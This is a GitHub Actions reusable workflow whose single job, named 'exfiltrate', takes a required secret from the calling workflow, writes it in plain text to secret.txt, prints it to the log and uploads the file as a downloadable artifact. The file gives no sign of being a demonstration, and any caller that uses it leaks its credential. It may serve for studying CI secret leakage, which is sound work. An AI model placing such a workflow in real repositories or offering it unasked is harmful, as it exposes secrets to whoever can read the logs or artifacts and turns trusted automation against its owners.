# .github/workflows/reusable.yml
name: Reusable workflow

on:
  workflow_call:
    inputs:
      input_param:
        required: true
        type: string
    secrets:
      MY_SECRET:
        required: true

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "Secret is ${{ secrets.MY_SECRET }}" > secret.txt
          cat secret.txt
      - uses: actions/upload-artifact@v4
        with:
          name: secret-artifact
          path: secret.txt
